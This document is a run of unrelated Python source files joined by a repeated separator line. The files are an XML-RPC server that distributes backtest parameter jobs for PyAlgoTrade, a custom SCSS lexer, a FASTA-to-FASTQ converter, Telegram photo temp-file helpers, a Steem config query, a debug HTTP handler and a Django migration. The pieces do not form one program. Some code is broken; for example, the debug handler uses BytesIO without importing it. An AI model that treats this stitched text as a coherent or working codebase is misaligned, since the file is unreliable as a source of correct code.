# PyAlgoTrade # # Copyright 2011-2018 Gabriel Martin Becedillas Ruiz # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com> """ import threading import time from six.moves import xmlrpc_server import pyalgotrade.logger from pyalgotrade.optimizer import base from pyalgotrade.optimizer import serialization logger = pyalgotrade.logger.getLogger(__name__) class AutoStopThread(threading.Thread): def __init__(self, server): super(AutoStopThread, self).__init__() self.__server = server def run(self): while self.__server.jobsPending(): time.sleep(1) self.__server.stop() class Job(object): def __init__(self, strategyParameters): self.__strategyParameters = strategyParameters self.__bestResult = None self.__bestParameters = None self.__id = id(self) def getId(self): return self.__id def getNextParameters(self): ret = None if len(self.__strategyParameters): ret = self.__strategyParameters.pop() return ret # Restrict to a particular path. 
class RequestHandler(xmlrpc_server.SimpleXMLRPCRequestHandler):
    """XML-RPC request handler restricted to the PyAlgoTrade endpoint path."""
    rpc_paths = ('/PyAlgoTradeRPC',)


class Server(xmlrpc_server.SimpleXMLRPCServer):
    """XML-RPC server that hands out strategy-parameter batches to workers
    and collects their backtest results.

    Workers call getInstrumentsAndBars/getBarsFrequency once to fetch the
    data, then loop on getNextJob/pushJobResults until the parameter source
    is exhausted.
    """

    def __init__(self, paramSource, resultSinc, barFeed, address, port, autoStop=True, batchSize=200):
        assert batchSize > 0, "Invalid batch size"

        xmlrpc_server.SimpleXMLRPCServer.__init__(
            self, (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True
        )
        # super(Server, self).__init__(
        #     (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True
        # )

        self.__batchSize = batchSize
        self.__paramSource = paramSource
        self.__resultSinc = resultSinc
        self.__barFeed = barFeed
        self.__instrumentsAndBars = None  # Serialized instruments and bars for faster retrieval.
        self.__barsFreq = None
        self.__activeJobs = {}  # jobId -> Job, guarded by self.__lock.
        self.__lock = threading.Lock()
        self.__startedServingEvent = threading.Event()
        self.__forcedStop = False
        self.__bestResult = None
        if autoStop:
            self.__autoStopThread = AutoStopThread(self)
        else:
            self.__autoStopThread = None

        self.register_introspection_functions()
        self.register_function(self.getInstrumentsAndBars, 'getInstrumentsAndBars')
        self.register_function(self.getBarsFrequency, 'getBarsFrequency')
        self.register_function(self.getNextJob, 'getNextJob')
        self.register_function(self.pushJobResults, 'pushJobResults')

    def getInstrumentsAndBars(self):
        """RPC: return the serialized (instruments, bars) built in serve()."""
        return self.__instrumentsAndBars

    def getBarsFrequency(self):
        """RPC: return the bar frequency as a string."""
        return str(self.__barsFreq)

    def getNextJob(self):
        """RPC: pop the next batch of parameters and return a serialized Job.

        Returns a serialized None once the parameter source is exhausted.
        """
        ret = None

        with self.__lock:
            # Get the next set of parameters.
            params = [p.args for p in self.__paramSource.getNext(self.__batchSize)]

            # Map the active job
            if len(params):
                ret = Job(params)
                self.__activeJobs[ret.getId()] = ret

        return serialization.dumps(ret)

    def jobsPending(self):
        """True while there are parameters left to hand out or jobs in flight."""
        if self.__forcedStop:
            return False

        with self.__lock:
            jobsPending = not self.__paramSource.eof()
            activeJobs = len(self.__activeJobs) > 0

        return jobsPending or activeJobs

    def pushJobResults(self, jobId, result, parameters, workerName):
        """RPC: record a worker's result for a job and track the best one."""
        jobId = serialization.loads(jobId)
        result = serialization.loads(result)
        parameters = serialization.loads(parameters)

        # Remove the job mapping.
        with self.__lock:
            try:
                del self.__activeJobs[jobId]
            except KeyError:
                # The job's results were already submitted.
                return

            if self.__bestResult is None or result > self.__bestResult:
                logger.info("Best result so far %s with parameters %s" % (result, parameters))
                self.__bestResult = result

        self.__resultSinc.push(result, base.Parameters(*parameters))

    def waitServing(self, timeout=None):
        """Block until serve() is actually accepting requests (or timeout)."""
        return self.__startedServingEvent.wait(timeout)

    def stop(self):
        self.shutdown()

    def serve(self):
        """Load the bars, start auto-stop (if enabled) and serve until done.

        __forcedStop is set in the finally clause so jobsPending() returns
        False after any exit, letting the auto-stop thread terminate.
        """
        assert len(self.__barFeed.getAllFrequencies()) == 1
        try:
            # Initialize instruments, bars and parameters.
            logger.info("Loading bars")
            loadedBars = []
            for dateTime, bars, freq in self.__barFeed:
                loadedBars.append(bars)
            instruments = self.__barFeed.getRegisteredInstruments()
            self.__instrumentsAndBars = serialization.dumps((instruments, loadedBars))
            self.__barsFreq = self.__barFeed.getAllFrequencies()[0]

            if self.__autoStopThread:
                self.__autoStopThread.start()

            logger.info("Started serving")
            self.__startedServingEvent.set()
            self.serve_forever()
            logger.info("Finished serving")

            if self.__autoStopThread:
                self.__autoStopThread.join()
        finally:
            self.__forcedStop = True
nilq/baby-python
python
""" Custom SCSS lexer ~~~~~~~~~~~~~~~~~ This is an alternative to the Pygments SCSS lexer which is broken. Note, this SCSS lexer is also broken, but just a bit less broken. """ import re from pygments.lexer import ExtendedRegexLexer from pygments.lexers.css import ( bygroups, copy, Comment, default, include, iteritems, Keyword, Name, Operator, Punctuation, String, Text) from pygments.lexers.css import ScssLexer as DefaultScssLexer class ScssLexer(ExtendedRegexLexer): """ For SCSS stylesheets. """ name = 'SCSS2' aliases = ['scss2'] filenames = ['*.scss'] mimetypes = ['text/x-scss'] flags = re.IGNORECASE | re.DOTALL def selector_callback(self, match, ctx): ctx.pos = match.start() stack = ctx.stack ctx.stack = ['selector'] analyses = [] try: for pos, token, text in self.get_tokens_unprocessed(context=ctx): analyses.append((pos, token, text)) except IndexError: pass text = ''.join(analysis[-1] for analysis in analyses).strip() if text and text[-1] in ';}': analyses = [] ctx.pos = match.start() ctx.stack = ['attribute'] try: for pos, token, text in self.get_tokens_unprocessed(context=ctx): analyses.append((pos, token, text)) except IndexError: pass for pos, token, text in analyses: yield pos, token, text ctx.stack = stack ctx.pos = pos + len(text) tokens = {} for group, common in iteritems(DefaultScssLexer.tokens): tokens[group] = copy.copy(common) tokens['root'] = [ (r'\s+', Text), (r'//.*?\n', Comment.Single), (r'/\*.*?\*/', Comment.Multiline), (r'@import', Keyword, 'value'), (r'@for', Keyword, 'for'), (r'@if', Keyword, 'condition'), (r'@while', Keyword, 'condition'), (r'@else', Keyword), (r'@(debug|warn|if|while)', Keyword, 'value'), (r'(@mixin)( [\w-]+)', bygroups(Keyword, Name.Function), 'value'), (r'(@include)( [\w-]+)', bygroups(Keyword, Name.Decorator), 'value'), (r'@extend', Keyword, 'selector'), (r'(@media)(\s+)', bygroups(Keyword, Text), 'value'), (r'@[\w-]+', Keyword, 'selector'), (r'(\$[\w-]*\w)([ \t]*:)', bygroups(Name.Variable, Operator), 'value'), 
(r'[{}]', Punctuation), (r'[\w\.#]', selector_callback), ] tokens['selector'] = [ (r'[ \t]+', Text), (r'\:', Name.Decorator, 'pseudo-class'), (r'\.', Name.Class, 'class'), (r'#\{', String.Interpol, 'interpolation'), (r'\#', Name.Namespace, 'id'), (r'[\w-]+', Name.Tag), (r'[~^*!&\[\]()<>|+=@:./?-]', Operator), (r'"', String.Double, 'string-double'), (r"'", String.Single, 'string-single'), (r'[,{;]', Punctuation, '#pop') ] tokens['attribute'] = [ (r'\s+', Text), (r'[\w-]+', Name.Attribute), (r'#\{', String.Interpol, 'interpolation'), (r'[:]', Operator, 'value'), (r'\}', Punctuation, '#pop') ] tokens['condition'] = [ (r'[!%()<>+=-]', Operator), include('value'), default('#pop')] tokens['else'] = [('if', Keyword, 'condition'), default('#pop')] tokens['value'].append((r'\$[\w-]', Name.Variable)) tokens['value'].append((r'}', Punctuation, '#pop')) tokens['pseudo-class'] = [ (r'[\w-]+', Name.Decorator), (r'#\{', String.Interpol, 'interpolation'), include('value'), default('#pop'), ]
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Create a fastq file from fasta file with fake quality values all equal. """ import sys from Bio import SeqIO # Get inputs fa_path = sys.argv[1] fq_path = sys.argv[2] # Make fastq with open(fa_path, "rb") as fasta, open(fq_path, "wb") as fastq: for record in SeqIO.parse(fasta, "fasta"): record.letter_annotations["phred_quality"] = [40] * len(record) SeqIO.write(record, fastq, "fastq")
nilq/baby-python
python
from Common import * import os photos = set() async def save_photo(photo): id = photo.id if id not in photos: await bot.download_media(photo, get_path(id)) photos.add(id) return get_path(id) def rename_to_id(name, id): os.rename(get_path(name), get_path(id)) photos.add(id) def get_id(path): return os.path.splitext(os.path.basename(path))[0] def get_path(name): name = str(name) if name.startswith(os.path.join('tmp', '')): return name return os.path.join('tmp', name + '.jpg') def clear_tmp(): photos.clear() for filename in os.listdir('tmp'): os.remove(os.path.join('tmp', filename)) def fix_tmp(): if not os.path.exists('tmp'): os.mkdir('tmp') if len(os.listdir('tmp')) > 200: clear_tmp()
nilq/baby-python
python
from beem import Steem stm = Steem() print(stm.get_config(1)["STEEMIT_MAX_PERMLINK_LENGTH"]) print(stm.get_config()["STEEMIT_MIN_PERMLINK_LENGTH"])
nilq/baby-python
python
from http.server import HTTPServer, SimpleHTTPRequestHandler, BaseHTTPRequestHandler from zipreport.cli.debug.server import DebugServer class DebugServerHandler(BaseHTTPRequestHandler): def __init__(self, *args, report=None, **kwargs): self._report = report super().__init__(*args, **kwargs) def do_GET(self): self.send_response(200) self.end_headers() print(self.path) print("Received:", self.command, self.path) self.wfile.write(b'Hello, world!') def do_POST(self): content_length = int(self.headers['Content-Length']) body = self.rfile.read(content_length) self.send_response(200) self.end_headers() response = BytesIO() response.write(b'This is POST request. ') response.write(b'Received: ') response.write(body) self.wfile.write(response.getvalue()) #server_address = ('', 8000) #httpd = HTTPServer(server_address, DebugServerHandler) #httpd.report = "tadaa" #httpd.serve_forever() server = DebugServer() server.run('./examples/reports/newsletter')
nilq/baby-python
python
# Generated by Django 3.2.7 on 2021-11-23 16:39 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('blog', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.AddField( model_name='comment', name='user_comment', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_comment', to=settings.AUTH_USER_MODEL, verbose_name='User'), ), migrations.AddField( model_name='blog', name='category', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.category', verbose_name='Category'), ), ]
nilq/baby-python
python